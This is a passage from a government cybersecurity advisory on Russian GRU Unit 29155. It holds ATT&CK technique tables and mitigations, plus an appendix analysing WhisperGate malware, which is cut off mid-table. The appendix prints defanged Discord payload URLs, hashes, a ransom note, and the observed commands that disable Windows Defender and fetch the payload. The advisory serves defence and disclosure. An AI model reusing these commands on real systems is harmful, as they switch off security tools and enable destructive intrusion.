<td><a href="https://attack.mitre.org/versions/v15/techniques/T1090/003/" title="Proxy: Multi-hop Proxy">T1090.003</a></td>
<td>
<p>Unit 29155 cyber actors executed commands via ProxyChains—a tool used to route internal traffic through a series of proxies.</p>
<p>ProxyChains was also used to provide further anonymity and modify system configuration to force network traffic through chains of SOCKS5 proxies and respective ports.</p>
</td>
</tr>
<tr>
<td>Application Layer Protocol: Web Protocols</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1071/001/" title="Application Layer Protocol: Web Protocols">T1071.001</a></td>
<td>Unit 29155 cyber actors use POST requests over HTTP to send payloads to victims.</td>
</tr>
<tr>
<td>Application Layer Protocol: DNS</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1071/004/" title="Application Layer Protocol: DNS">T1071.004</a></td>
<td>Unit 29155 cyber actors used DNS tunneling tools, such as dnscat/2 and Iodine, to tunnel IPv4 network traffic.</td>
</tr>
<tr>
<td>Non-Application Layer Protocol</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1095/" title="Non-Application Layer Protocol">T1095</a></td>
<td>Unit 29155 cyber actors commonly use a reverse TCP connection to initiate communication with their infrastructure.</td>
</tr>
<tr>
<td>Ingress Tool Transfer</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1105/" title="Ingress Tool Transfer">T1105</a></td>
<td>When an exploit is successfully executed on a victim system, Unit 29155 cyber actors are known to launch the Meterpreter payload to initiate communication with their actor-controlled systems.</td>
</tr>
<tr>
<td>Protocol Tunneling</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1572/" title="Protocol Tunneling">T1572</a></td>
<td>Unit 29155 cyber actors have used infrastructure configured with OpenVPN configuration to tunnel traffic over a single port (1194), VPNs, and GOST to anonymize their operational activity.</td>
</tr>
</tbody>
</table>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 13: Exfiltration</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Exfiltration Over Web Service: Exfiltration to Cloud Storage</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1567/002/" title="Exfiltration Over Web Service: Exfiltration to Cloud Storage">T1567.002</a></td>
<td>Unit 29155 cyber actors exfiltrated data to the cloud storage and file hosting service, MEGA (mega[.]nz), using Rclone.</td>
</tr>
</tbody>
</table>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 14: Impact</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title </th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Data Destruction</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1485/" title="Data Destruction">T1485</a></td>
<td>Unit 29155 cyber actors’ objectives include the destruction of data.</td>
</tr>
</tbody>
</table>
<h2><strong>Mitigations</strong></h2>
<p>The authoring agencies recommend organizations implement the mitigations supplied below to improve organizational cybersecurity posture based on threat actor activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" title="Cross-Sector Cybersecurity Performance Goals">Cross-Sector Cybersecurity Performance Goals</a> for more information on the CPGs, including additional recommended baseline protections.</p>
<h3>Limit Adversarial Use of Common Vulnerabilities</h3>
<ul>
<li><strong>Prioritize patching to CISA’s </strong><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" title="Known Exploited Vulnerabilities Catalog"><strong>Known Exploited Vulnerabilities Catalog</strong></a><strong>, </strong>especially for CVEs identified in this advisory, and then critical and high vulnerabilities that allow for remote code execution on internet-facing devices.</li>
<li><strong>Conduct regular automated vulnerability scans</strong> to perform vulnerability assessments on all network resources based on threat actor behaviors and known exploitable vulnerabilities (<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#MitigatingKnownVulnerabilities1E" title="Mitigating Known Vulnerabilities (1.E)">CISA CPG 1.E</a>).</li>
<li><strong>Limit exploitable services on internet-facing assets,</strong> such as email and remote management protocols (<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#EmailSecurity2M">CISA CPGs 2.M</a>, <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#NoExploitableServicesontheInternet2W" title="No Exploitable Services on the Internet (2.W)">2.W</a>). Where necessary services must be exposed, such as services hosted in a demilitarized zone (DMZ), implement the appropriate compensatory controls to prevent common forms of abuse and exploitation. Disable all unnecessary operating system applications and network protocols to combat adversary enumeration. For additional guidance, see <a href="https://www.cisa.gov/sites/default/files/publications/CISAInsights-Cyber-RemediateVulnerabilitiesforInternetAccessibleSystems_S508C.pdf" title="Remediate Vulnerabilities for Internet-Accessible Systems">CISA Insights: Remediate Vulnerabilities for Internet-Accessible Systems</a>.</li>
<li><strong>U.S. organizations can utilize a range of CISA services at no cost, including vulnerability scanning and testing, to help organizations reduce exposure to threats.</strong> CISA Cyber Hygiene services can provide additional review of internet-accessible assets and provide regular reports on steps to take to mitigate vulnerabilities. Email <a href="mailto:vulnerability@cisa.dhs.gov" title="Vulnerability">vulnerability@cisa.dhs.gov</a> with the subject line, “Requesting Cyber Hygiene Services,” to get started.</li>
<li><strong>Software manufacturers, vendors, and consumers</strong> are encouraged to review CISA and NIST’s <a href="https://www.cisa.gov/resources-tools/resources/defending-against-software-supply-chain-attacks-0#:~:text=The%20Defending%20Against%20Software%20Supply%20Chain%20Attacks%2C%20released,identify%2C%20assess%2C%20and%20mitigate%20software%20supply%20chain%20risks." title="Defending Against Software Supply Chain Attacks">Defending Against Supply Chain Attacks</a>. This publication provides an overview of software supply chain risks and recommendations for how software customers and vendors can use the NIST Cyber Supply Chain Risk Management (C-SCRM) Framework and the Secure Software Development Framework (SSDF) to identify, assess, and mitigate software supply chain risks. CISA recommends comprehensive mitigations for supply chain incident reporting, vulnerability disclosing (e.g., security.txt), and choosing a trusted supplier or vendor that observes proper cyber security hygiene (<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#SupplyChainIncidentReporting1G" title="Supply Chain Incident Reporting (1.G)">CISA CPG 1.G</a>, <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#SupplyChainVulnerabilityDisclosure1H" title="Supply Chain Vulnerability Disclosure (1.H)">1.H</a>, <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#VendorSupplierCybersecurityRequirements1I" title="Vendor/Supplier Cybersecurity Requirements (1.I)">1.I</a>) to defend against upstream attacks.</li>
</ul>
<h3>Deploy Protective Controls and Architecture</h3>
<ul>
<li><strong>Implement network segmentation.</strong> Network segmentation can help prevent lateral movement by controlling traffic flows between—and access to—various subnetworks (<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#NetworkSegmentation2F" title="Network Segmentation (2.F)">CISA CPG 2.F</a>). Best practice mitigations include updating Identity and Access Management (IAM) and employing phishing-resistant MFA for all devices and accounts identified as organizational assets. For additional guidance, see CISA and NSA’s <a href="https://www.cisa.gov/news-events/alerts/2023/03/21/cisa-and-nsa-release-enduring-security-framework-guidance-identity-and-access-management" title="CISA and NSA Release Enduring Security Framework Guidance on Identity and Access Management">IAM Recommended Best Practices Guide for Administrators</a> (<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#PhishingResistantMultifactorAuthenticationMFA2H" title="Phishing-Resistant Multifactor Authentication (MFA) (2.H)">CISA CPG 2.H</a>).</li>
<li><strong>Verify and ensure that sensitive data, including credentials, are not stored in plaintext and can only be accessed by authenticated and authorized users.</strong> Credentials must be stored in a secure manner, such as with a credential/password manager to protect from malicious enumeration (<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#SecureSensitiveData2L" title="Secure Sensitive Data (2.L)">CISA CPG 2.L</a>).</li>
<li><strong>Disable and/or restrict use of command line and PowerShell activity.</strong> Update to the latest version and uninstall all earlier PowerShell versions (<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#DisableMacrosbyDefault2N" title="Disable Macros by Default (2.N)">CISA CPG 2.N</a>).</li>
<li><strong>Implement a continuous system monitoring program, such as security information and event management (SIEM) or endpoint detection and response (EDR) solutions,</strong> to comprehensively log and review all authorized external access connections. This logging will better ensure the prompt detection of misuse or abnormal activity (<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#LogCollection2T" title="Log Collection (2.T)">CISA CPG 2.T</a>).</li>
<li><strong>Monitor for unauthorized access attempts and programming anomalies</strong> through comprehensive logging that is secured from modification, such as limiting permissions and adding redundant remote logging (<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#SecureLogStorage2U" title="Secure Log Storage (2.U)">CISA CPG 2.U</a>). Security appliances should be set to detect and/or block Impacket framework indicators, PSExec or WMI commands, and suspicious PowerShell commands for timely identification and remediation.</li>
<li><strong>Identify any use of outdated or weak encryption,</strong> update these to sufficiently strong algorithms, and consider the implications of post-quantum cryptography (<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#StrongandAgileEncryption2K" title="Strong and Agile Encryption (2.K)">CISA CPG 2.K</a>). Use properly configured and up-to-date Secure Socket Layer (SSL)/Transport Layer Security (TLS) to protect data in transit.</li>
</ul>
<h2><strong>Security Controls</strong></h2>
<p>In addition to applying mitigations, the authoring agencies recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&amp;CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&amp;CK techniques described in this advisory.</p>
<p>To get started:</p>
<ol>
<li>Select an ATT&amp;CK technique described in this advisory (see <strong>Table 3 to Table 14</strong>).</li>
<li>Align your security technologies against the technique.</li>
<li>Test your technologies against the technique.</li>
<li>Analyze your detection and prevention technologies’ performance.</li>
<li>Repeat the process for all security technologies to obtain a set of comprehensive performance data.</li>
<li>Tune your security program, including people, processes, and technologies, based on the data generated by this process.</li>
</ol>
<p>The authoring agencies recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&amp;CK techniques identified in this advisory.</p>
<h2><strong>Resources</strong></h2>
<ul>
<li><a href="https://attack.mitre.org/software/S0689/">MITRE: WhisperGate</a></li>
<li><a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-057a">CISA AA22-057A: Destructive Malware Targeting Organizations in Ukraine</a></li>
<li><a href="https://www.justice.gov/opa/pr/russian-national-charged-conspiring-russia-military-intelligence-destroy-ukrainian">DOJ Press Release: Russian National Charged for Conspiring with Russian Military Intelligence to Destroy Ukrainian Government Computer Systems and Data</a></li>
<li><a href="https://www.fbi.gov/investigate/cyber">FBI: Cyber Crime</a></li>
<li><a href="https://www.cisa.gov/topics/cyber-threats-and-advisories/advanced-persistent-threats/russia">CISA: Russia Cyber Threat Overview and Advisories</a></li>
<li><a href="https://attack.mitre.org/groups/G1003/">MITRE: Group G1003 - Ember Bear</a></li>
<li><a href="https://attack.mitre.org/versions/v15/software/S0357/">MITRE: Impacket</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-1472">NIST NVD: CVE-2020-1472</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-26084">NIST NVD: CVE-2021-26084</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-3156">NIST NVD: CVE-2021-3156</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-4034">NIST NVD: CVE-2021-4034</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2022-27666">NIST NVD: CVE-2022-27666</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-33044">NIST NVD: CVE-2021-33044</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-33045">NIST NVD: CVE-2021-33045</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2022-26134">NIST NVD: CVE-2022-26134</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2022-26138">NIST NVD: CVE-2022-26138</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2022-3236">NIST NVD: CVE-2022-3236</a></li>
<li><a href="https://attack.mitre.org/software/S0521/">MITRE: BloodHound</a></li>
<li><a href="https://attack.mitre.org/versions/v15/software/S1040/">MITRE: Rclone</a></li>
<li><a href="https://attack.mitre.org/versions/v15/software/S0598/">MITRE: P.A.S. Webshell</a></li>
<li><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog">CISA: Known Exploited Vulnerabilities Catalog</a></li>
<li><a href="https://www.cisa.gov/sites/default/files/publications/CISAInsights-Cyber-RemediateVulnerabilitiesforInternetAccessibleSystems_S508C.pdf">CISA Insights: Remediate Vulnerabilities for Internet-Accessible Systems</a></li>
<li><a href="https://www.cisa.gov/resources-tools/resources/defending-against-software-supply-chain-attacks-0#:~:text=The%20Defending%20Against%20Software%20Supply%20Chain%20Attacks%2C%20released,identify%2C%20assess%2C%20and%20mitigate%20software%20supply%20chain%20risks.">CISA, NIST: Defending Against Supply Chain Attacks</a></li>
<li><a href="https://www.cisa.gov/news-events/alerts/2023/03/21/cisa-and-nsa-release-enduring-security-framework-guidance-identity-and-access-management">CISA, NSA: IAM Recommended Best Practices Guide for Administrators</a></li>
</ul>
<h2><strong>References</strong></h2>
<ol>
<li><a href="https://www.microsoft.com/en-us/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/">Microsoft Threat Intelligence Center: Destructive Malware Targeting Ukrainian Organizations</a></li>
<li><a href="https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/?msockid=2383e2d882c06a751a17f64383d26b64">Microsoft Threat Intelligence Center: Cadet Blizzard Emerges as a Novel and Distinct Russian Threat Actor</a></li>
<li><a href="https://www.crowdstrike.com/blog/who-is-ember-bear/">CrowdStrike: EMBER BEAR Threat Actor Profile</a></li>
<li><a href="https://cloud.google.com/blog/topics/threat-intelligence/russia-invasion-ukraine-retaliation/">Mandiant Threat Intelligence: Responses to Russia's Invasion of Ukraine Likely to Spur Retaliation</a> </li>
<li><a href="https://www.sentinelone.com/blog/threat-actor-uac-0056-targeting-ukraine-with-fake-translation-software/">SentinelOne: Threat Actor UAC-0056 Targeting Ukraine with Fake Translation Software</a></li>
<li><a href="https://www.acunetix.com/support/docs/introduction/">Introduction to Acunetix</a></li>
<li><a href="https://github.com/owasp-amass/amass">GitHub: OWASP Amass</a></li>
<li><a href="https://kalilinuxtutorials.com/droopescan/">Kali Linux Tutorials: Droopescan</a></li>
<li><a href="https://github.com/OWASP/joomscan">GitHub: OWASP JoomScan</a></li>
<li><a href="https://www.kali.org/tools/masscan/">Kali.org: MASSCAN</a></li>
<li><a href="https://www.digitalocean.com/community/tutorials/how-to-use-netcat-to-establish-and-test-tcp-and-udp-connections">DigitalOcean: How To Use Netcat to Establish and Test TCP and UDP Connections</a></li>
<li><a href="https://help.shodan.io/the-basics/what-is-shodan">Shodan: What is Shodan?</a></li>
<li><a href="https://docs.virustotal.com/docs/how-it-works">VirusTotal: How it Works</a></li>
<li><a href="https://github.com/jbaines-r7/through_the_wire">GitHub: Through the Wire</a></li>
<li><a href="https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html">Confluence Security Advisory: Confluence Server and Data Center - CVE-2022-26134</a></li>
<li><a href="https://learn.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010">Microsoft: Security Bulletin MS17-010</a></li>
<li><a href="https://www.avast.com/c-eternalblue">Avast: What is EternalBlue and Why is the MS17-010 Exploit Still Relevant?</a></li>
<li><a href="https://unit42.paloaltonetworks.com/ukraine-cyber-conflict-cve-2021-32648-whispergate/">Palo Alto Networks Unit 42: Threat Brief - Ongoing Russia and Ukraine Cyber Activity</a></li>
<li><a href="https://cert.gov.ua/article/18419">CERT-UA#3799 Report</a></li>
<li><a href="https://www.bellingcat.com/news/2022/02/23/attack-on-ukrainian-government-websites-linked-to-russian-gru-hackers/">Bellingcat: Attack on Ukrainian Government Websites Linked to GRU Hackers</a></li>
<li><a href="https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html">Trend Micro: Cyberattacks are Prominent in the Russia-Ukraine Conflict</a></li>
</ol>
<h2><strong>Contact Information</strong></h2>
<p>To report suspicious or criminal activity related to information found in this joint Cybersecurity Advisory, contact <a href="https://www.fbi.gov/contact-us/field-offices">your local FBI field office</a> or CISA’s 24/7 Operations Center at <a href="mailto:Report@cisa.gov">Report@cisa.gov</a> or (888) 282-0870. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. For NSA client requirements or general cybersecurity inquiries, contact <a href="mailto:Cybersecurity_Requests@nsa.gov">Cybersecurity_Requests@nsa.gov</a>.</p>
<h2><strong>Disclaimer</strong></h2>
<p>The information in this report is being provided “as is” for informational purposes only. CISA and the authoring agencies do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and the authoring agencies.</p>
<h2><strong>Version History</strong></h2>
<p><strong>September 5, 2024:</strong> Initial version.</p>
<h2><strong>Appendix A: WhisperGate Malware Analysis</strong></h2>
<h3>Overview</h3>
<p>This technical analysis details the WhisperGate malware deployed against Ukraine; samples were collected from one victim and analyzed. The analysis provides insight into Unit 29155 cyber actor infrastructure used for network scanning, password compromising, and data exfiltration against Ukraine, NATO members in Europe and North America, and countries in Latin America and Central Asia.</p>
<p>Unit 29155 cyber actors’ use of WhisperGate involved the deployment of the malware files, <code>stage1.exe</code> and <code>stage2.exe</code>. WhisperGate has two stages that corrupts a system’s master boot record, displays a fake ransomware note, and encrypts files based on certain file extensions (see <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-057a">AA22-057A</a>). The actors used multiple Discord accounts to store malware files, including what appears to be development versions or iterations of the binaries. Discord is commonly leveraged by threat actors as an endpoint for malware distribution and control; in this case, it was used to obtain the next step of the infection chain by directly sharing files through its platform. In the case of <code>stage2.exe</code>, the binary communicated with Discord to obtain <code>Tbopbh.jpg</code>—the malicious payload that is in-memory loaded and performs the destructive capabilities.[<a href="https://unit42.paloaltonetworks.com/ukraine-cyber-conflict-cve-2021-32648-whispergate/">18</a>]</p>
<h3>Categorization</h3>
<p>The Discord accounts associated with the WhisperGate campaign are categorized into three main clusters, labeled below as Clusters 1, 2, and 3. All clusters used Discord as a staging environment for malware deployment. These groupings are based on analysis of threat actor IP addresses and the nature of the malware that existed within the accounts. The following sections include notable details found within each cluster.</p>
<h4><strong>Cluster 1</strong></h4>
<p>Cluster 1 contained the following files:</p>
<ul>
<li><code>hxxps://cdn.discordapp[.]com/attachments/928503440139771947/930108637681184768/Tbopbh.jpg</code> (a resource, e.g., payload, for stage2.exe)[<a href="https://unit42.paloaltonetworks.com/ukraine-cyber-conflict-cve-2021-32648-whispergate/">18</a>]</li>
<li><code>saint.exe</code> (a downloader, <code>SaintBot</code>, as detailed by CERT-UA)[<a href="https://cert.gov.ua/article/18419">19</a>]</li>
<li><code>puttyjejfrwu.exe</code>[<a href="https://cert.gov.ua/article/18419">19</a>]</li>
</ul>
<h4><strong>Cluster 2</strong></h4>
<p>Cluster 2 contained:</p>
<ul>
<li><code>hxxps://cdn.discordapp[.]com/attachments/888408190625128461/895633952247799858/n.lashevychdirekcy.atom.gov.ua.zip</code> (means for sending malware in over 35 different zip files via Discord links)[<a href="https://www.bellingcat.com/news/2022/02/23/attack-on-ukrainian-government-websites-linked-to-russian-gru-hackers/">20</a>]</li>
<li>Several Microsoft Word documents with macros that download <code>test01.exe</code> from <code>3237.site</code>. Once executed, <code>test01.exe</code> downloads <code>load2022.exe</code> from <code>smm2021.net</code>.</li>
</ul>
<h4><strong>Cluster 3</strong></h4>
<p>Cluster 3 contained:</p>
<ul>
<li><code>hxxps://cdn.discordapp[.]com/attachments/945968593030496269/945970446149509130/Client.exe</code> (<strong>Note: </strong>Unit 29155 cyber actors’ use of <code>Client.exe</code> was confirmed as linked to the activity, but the file was not obtained for analysis and functionality cannot be confirmed.) </li>
<li><code>asd.exe</code> (likely a development version of <code>stage1.exe</code>)</li>
</ul>
<h3>Behavioral Analysis</h3>
<p>Two Windows Portable Executable (PE) files (<code>stage1.exe</code> and <code>stage2.exe</code>) were obtained from the Ukrainian victim for analysis. One PE file (<code>asd.exe</code>) was obtained from a U.S. victim.</p>
<h4><strong>stage1.exe</strong></h4>
<p><code>stage1.exe</code> was obtained from the C:\ path of the Ukrainian victim’s Windows machine. <code>stage1.exe</code> executes when the infected device is powered down, overwriting the master boot record (MBR) and preventing the system from booting normally. <strong>Table 15</strong> lists the hashes and properties attributed to <code>stage1.exe</code>.</p>
<div>
<table>
<caption><em>Table 15: stage1.exe Properties</em></caption>
<tbody>
<tr>
<th>MD5</th>
<td>5d5c99a08a7d927346ca2dafa7973fc1</td>
</tr>
<tr>
<th>SHA-256</th>
<td>a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92</td>
</tr>
<tr>
<th>Compiler</th>
<td>MinGW(GCC: (GNU) 6.3.0)[-]</td>
</tr>
<tr>
<th>Linker</th>
<td>GNU linker Id (GNU Binutils)(2.28)[GUI32]</td>
</tr>
<tr>
<th>TimeDateStamp</th>
<td>2022-01-10 05:37:18</td>
</tr>
<tr>
<th>Execution Message</th>
<td>Your hard drive has been corrupted. In case you want to recover all hard drives of your organization, You should pay us $10k via bitcoin wallet 1AVNM68gj6PGPFcJuftKATa4WLnzg8fpfv and send message via tox ID 8BEDC411012A33BA34F49130D0F186993C6A32DAD8976F6A5D82C1ED23054C057ECED5496F65 with your organization name. We will contact you to give further instructions.</td>
</tr>
</tbody>
</table>
</div>
<div>
<table>
<caption><em>Table 16: asd.exe Properties</em></caption>
<tbody>
<tr>
<th>MD5</th>
<td>eac0ae655d344c25ff467a929790885c</td>
</tr>
<tr>
<th>SHA-256</th>
<td>b9e64b58d7746cb1d3bed20405ef34d097af08c809d8dad10b9296b0bebb2b0b</td>
</tr>
<tr>
<th>Compiler</th>
<td>MinGW(GCC: (GNU) 6.3.0)[-]</td>
</tr>
<tr>
<th>Linker</th>
<td>GNU linker Id (GNU Binutils)(2.28)[Console32,console]</td>
</tr>
<tr>
<th>TimeDateStamp</th>
<td>1969-12-31 19:00:00</td>
</tr>
</tbody>
</table>
</div>
<p><code>asd.exe</code> is likely a development version of <code>stage1.exe</code>. While the behavior of <code>asd.exe</code> is similar to <code>stage1.exe</code>, the messages displayed were different.</p>
<h4><strong>stage2.exe</strong></h4>
<p><code>stage2.exe</code> was obtained from the C:\ path of the Ukrainian victim’s Windows machine. <strong>Table 17</strong> lists the hashes and properties attributed to <code>stage2.exe</code>.</p>
<div>
<table>
<caption><em>Table 17: stage2.exe Properties</em></caption>
<tbody>
<tr>
<th>MD5</th>
<td>764f691b2168e8b3b6f9fb6582e2f819</td>
</tr>
<tr>
<th>SHA-256</th>
<td>aa79afbf82b06cda268664b7c83900d8f7a33e0f0071facba0b3d8f7a68ce56a</td>
</tr>
<tr>
<th>Library</th>
<td>.NET(v4.0.30319)[-]</td>
</tr>
<tr>
<th>Linker</th>
<td>Microsoft Linker(6.0)(GUI32,signed)</td>
</tr>
<tr>
<th>TimeDateStamp</th>
<td>2022-01-10 09:39:54</td>
</tr>
</tbody>
</table>
<p><strong>Table 18</strong> lists the following chronological observations when stage2.exe executes.</p>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 18: stage2.exe Behavioral Analysis Observations</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Event</th>
<th role="columnheader">Victim Observation</th>
</tr>
</thead>
<tbody>
<tr>
<td>PowerShell command executed twice</td>
<td><code>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" –enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==</code></td>
</tr>
<tr>
<td>Base64 UTF-16LE string decoded</td>
<td><code>Start-Sleep -s 10</code></td>
</tr>
<tr>
<td>HTTP GET request sent to Discord URL to download Tbopbh.jpg</td>
<td>
<p><code>hxxp://cdn.discordapp.com/attachments/</code></p>
<p><code>928503440139771947/930108637681184768/Tbopbh[.]jpg</code></p>
</td>
</tr>
<tr>
<td>Nmddfrqqrbyjeygggda.vbs created and executed within the %TEMP% directory</td>
<td>
<p>The Visual Basic Script (VBS) file contained the following command:</p>
<p><code>CreateObject(“WScript.Shell”).Run “powershell Set-MpPreference -ExclusionPath ‘C:\’”, 0, False</code></p>
</td>
</tr>
<tr>
<td>AdvancedRun.exe created and executed twice</td>
<td>
<p><code>C:\Users\&lt;user&gt;\AppData\Local\Temp\AdvancedRun.exe” /EXEFilename “C:\Windows\System32\sc.exe” /WindowState 0 /CommandLine “stop WinDefend”  /StartDirectory “” /RunAs 8 /Run</code></p>
<p><code>C:\Users\&lt;user&gt;\AppData\Local\Temp\AdvancedRun.exe” /EXEFilename “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” /WindowState 0 /CommandLine “rmdir ‘C:\ProgramData\Microsoft\Windows Defender’ –Recurse” /StartDirectory “” /RunAs 8 /Run</code></p>
</td>
</tr>
<tr>
<td>InstallUtil.exe created and executed; files corrupted following execution</td>
<td><code>C:\Users\&lt;user&gt;\AppData\Local\Temp\InstallUtil.exe</code></td>
</tr>
</tbody>
</table>
<h3>Static Analysis</h3>
<p>Static analysis was further conducted on two files (<code>stage2.exe</code>, <code>Tbopbh.jpg</code>) to uncover additional malware functionality and attributes.</p>
<h4><strong>stage2.exe</strong></h4>
<p>Static analysis was performed on a variant of stage2.exe; its hashes and properties are listed in <strong>Table 19</strong> below. Of note, the MD5 and SHA-256 hash values were different than those obtained from the Ukrainian victim machine (listed above in <strong>Table 17</strong>). Behavioral analysis was also performed on the below variant and both files exhibited the same behavior.</p>
<div>
<table>
<caption><em>Table 19: stage2.exe Variant Properties</em></caption>
<tbody>
<tr>
<th>MD5</th>
<td>14c8482f302b5e81e3fa1b18a509289d</td>
</tr>
<tr>
<th>SHA-256</th>
<td>dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78</td>
</tr>
<tr>
<th>Library</th>
<td>.NET(v4.0.30319)[-]</td>
</tr>
<tr>
<th>Linker</th>
<td>Microsoft Linker(6.0)(GUI32,signed)</td>
</tr>
<tr>
<th>TimeDateStamp</th>
<td>2022-01-10 09:39:54</td>
</tr>
</tbody>
</table>
<p>This variant of <code>stage2.exe</code> contained multiple layers of execution:</p>
<ul>
<li><code>stage2.exe</code> contained a WebClient object that was initialized with Discord URL <code>hxxps://cdn.discordapp.com/attachments/928503440139771947/930108637681184768/Tbopbh.jpg</code> to obtain the payload <code>Tbopbh.jpg</code>.</li>
<li><code>stage2.exe</code> contained logic to reverse file bytes of a file using the Array’s Reverse method.</li>
<li><code>stage2.exe</code> contained logic to load an Assembly object into a Stream object.</li>
<li><code>stage2.exe</code> used the reflection library to call method <code>Ylfwdwgmpilzyaph</code> from the loaded Assembly object.</li>
<li><code>stage2.exe</code> contained decryption logic that resembled RC4, a C# class produced a base64 string and an encryption class which created a key using the decoded string. The encryption class used encryption logic every 32 bytes to decrypt. Additionally, the XOR functionality occurred using the initialized byte “Array” shown below. The encryption class resembled RC4; it was used every 32 bytes. The base64 string came from a class that contained EazFuscator logic to obfuscate code by eliminating control flow within code, as well as making symbols difficult to analyze:
<ul>
<li><code>byte[] array = new byte[] {148, 68, 208, 52, 241, 93, 195, 220};</code></li>
</ul>
</li>
<li><code>stage2.exe</code> contained EazFuscator class logic. This included logic that built strings during runtime; otherwise, the full strings would have been obfuscated and further segmented when viewed statically. The following is an example of a built string:
<ul>
<li><code>UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==</code></li>
</ul>
</li>
<li>When the above string was base64 decoded, the system displayed the following PowerShell command: <code>Start-Sleep -s 10</code></li>
<li><code>stage2.exe</code> served as the downloader and driver logic for the malware payload, <code>Tbopbh.jpg</code>.</li>
</ul>
<h4><strong>Tbopbh.jpg (payload for stage2.exe variant)</strong></h4>
<p>An account in Discord Cluster 1 contained malware with the following hashes, labeled as Tbopbh.jpg:</p>
<ul>
<li>MD5: <code>b3370eb3c5ef6c536195b3bea0120929</code></li>
<li>SHA-256: <code>923eb77b3c9e11d6c56052318c119c1a22d11ab71675e6b95d05eeb73d1accd6</code></li>
</ul>
<p>When viewing payload <code>Tbopbh.jpg</code> using a hex editor, it ended with value “ZM” or hex values “5A 4D”—this indicated the payload was a reversed PE. Reversing the bytes of <code>Tbopbh.jpg</code> revealed the hashes of the resulting payload listed in <strong>Table 20</strong> below.</p>
<div>
<table>
<caption><em>Table 20: Tbopbh.jpg Properties</em></caption>
<tbody>
<tr>
<th>MD5</th>
<td>e61518ae9454a563b8f842286bbdb87b</td>
</tr>
<tr>
<th>SHA-256</th>
<td>9ef7dbd3da51332a78eff19146d21c82957821e464e8133e9594a07d716d892d</td>
</tr>
<tr>
<th>Protector</th>
<td>Eazfuscator(-)[-]</td>
</tr>
<tr>
<th>Library</th>
<td>.NET(v4.0.30319)[-]</td>
